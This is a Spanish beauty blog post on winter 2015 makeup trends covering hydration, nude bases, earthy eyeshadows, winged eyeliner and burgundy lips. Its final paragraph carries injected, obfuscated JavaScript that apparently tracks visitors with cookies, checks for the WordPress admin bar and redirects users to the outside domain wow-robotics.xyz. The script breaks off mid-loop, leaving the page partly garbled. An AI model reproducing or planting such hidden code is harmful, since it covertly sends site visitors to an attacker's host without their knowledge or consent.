comprar maquillaje online

El invierno también puede llenar tu rostro de luz y color. No tiene por qué ser frío y apagado. Lo único que necesitas es conocer lo último en tendencias de maquillaje para este año 2015.

Es muy importante que tu piel esté cuidada y protegida de cara a las bajas temperaturas. No olvides hidratar bien la piel ante las inclemencias del tiempo, usando siempre factor protector. Una piel cuidada es sinónimo de una piel bella.

Una vez que tu rostro esté listo, podrás aplicar las últimas tendencias en maquillaje sobre él:

• La piel se inclina por un acabado ni demasiado mate ni con demasiados brillos. El estilo nude sigue imponiéndose. Una base ligera, rematada con un toque de polvos en la zona de la frente y la barbilla, es más que suficiente.

• En cuanto a sombras, usa colores de temporada como el terracota, el color tierra o tonos color vino tinto. Triunfarás seguro. Y recuerda, los ojos ahumados o smokey siguen marcando tendencia, combinados con tonos metalizados perfectos para tu look de noche.

• Si quieres reforzar aún más tus ojos, el eyeliner nunca está pasado de moda. Vuelve el estilo años 50, así que puedes realizar un trazo estilo flecha en el parpado superior si tu mirada está algo caída o reforzarla con un trazo sutil en las pestañas de tu párpado inferior para darle un toque desenfadado. Atrévete a abandonar el color negro de vez en cuando, esta temporada los azules y los violetas son de lo más rompedor.

• El toque final para lucir espléndida este invierno son unos labios jugosos vestidos con colores burdeos.

Ten en cuenta que tu belleza no sólo depende de la época del año en la que estemos, sino también de tu tipo de piel, de tu color de ojos, así como de tu estilo y color de pelo. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone